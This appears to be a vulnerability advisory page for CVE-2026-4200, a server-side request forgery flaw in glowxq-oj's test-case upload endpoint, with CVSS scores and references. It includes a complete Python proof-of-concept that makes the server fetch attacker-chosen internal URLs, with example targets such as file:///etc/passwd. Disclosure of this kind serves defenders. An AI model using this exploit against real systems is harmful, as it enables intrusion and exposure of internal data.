Security Vulnerability Report
CVE-2026-4200 CVSS 7.3 HIGH

CVE-2026-4200

Published: 2026-03-16 14:20:05
Last Modified: 2026-04-29 01:00:02

Description

A security flaw has been discovered in glowxq glowxq-oj up to 6f7c723090472057252040fd2bbbdaa1b5ed2393. This affects the function uploadTestcaseZipUrl of the file business/business-oj/src/main/java/com/glowxq/oj/problem/controller/ProblemCaseController.java. Performing a manipulation results in server-side request forgery. The attack can be initiated remotely. The exploit has been released to the public and may be used for attacks. Continuous delivery with rolling releases is used by this product. Therefore, no version details of affected or updated releases are available. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS 3.1 (Primary)
Score: 7.3 (HIGH)
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
Exploitability Score: 3.9
Impact Score: 3.4

CVSS 4.0 (Secondary)
Score: 5.5 (MEDIUM)
Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Exploit Maturity: Proof of Concept

CVSS 2.0 (Secondary)
Score: 7.5 (HIGH)
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
Exploitability Score: 10.0
Impact Score: 6.4

Weakness
CWE-918 (Server-Side Request Forgery)

Configurations (Affected Products)

No configuration data available.

glowxq glowxq-oj <= 6f7c723090472057252040fd2bbbdaa1b5ed2393

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import sys

# CVE-2026-4200 SSRF PoC for glowxq-oj
# Target: glowxq-oj ProblemCaseController uploadTestcaseZipUrl function


def exploit_ssrf(target_url, internal_target):
    """
    Exploit SSRF vulnerability in uploadTestcaseZipUrl function

    Args:
        target_url: Base URL of vulnerable glowxq-oj instance
        internal_target: Internal resource to target
            (e.g., http://127.0.0.1:8888, file:///etc/passwd)

    Returns:
        Response from the internal target
    """
    endpoint = f"{target_url}/api/problem/case/upload-testcase-zip-url"

    # Construct malicious payload: the server fetches the supplied URL itself
    payload = {
        'url': internal_target,
        'problemId': '1'
    }

    try:
        response = requests.post(endpoint, json=payload, timeout=10)
        return response.text
    except requests.exceptions.RequestException as e:
        return f"Error: {str(e)}"


if __name__ == "__main__":
    if len(sys.argv) < 3:
        print("Usage: python cve-2026-4200_poc.py <target_url> <internal_target>")
        print("Example: python cve-2026-4200_poc.py http://vulnerable-host:8080 http://127.0.0.1:8888/admin")
        sys.exit(1)

    target = sys.argv[1]
    internal = sys.argv[2]

    print(f"[*] Targeting: {target}")
    print(f"[*] Internal target: {internal}")
    print("[*] Sending malicious request...")

    result = exploit_ssrf(target, internal)
    print(f"[+] Response:\n{result}")
```

References

https://fx4tqqfvdw4.feishu.cn/docx/K0SjdZTPRo31LExSdlfcC3jwn1c?from=from_copylink
https://vuldb.com/?ctiid.351112
https://vuldb.com/?id.351112
https://vuldb.com/?submit.770476
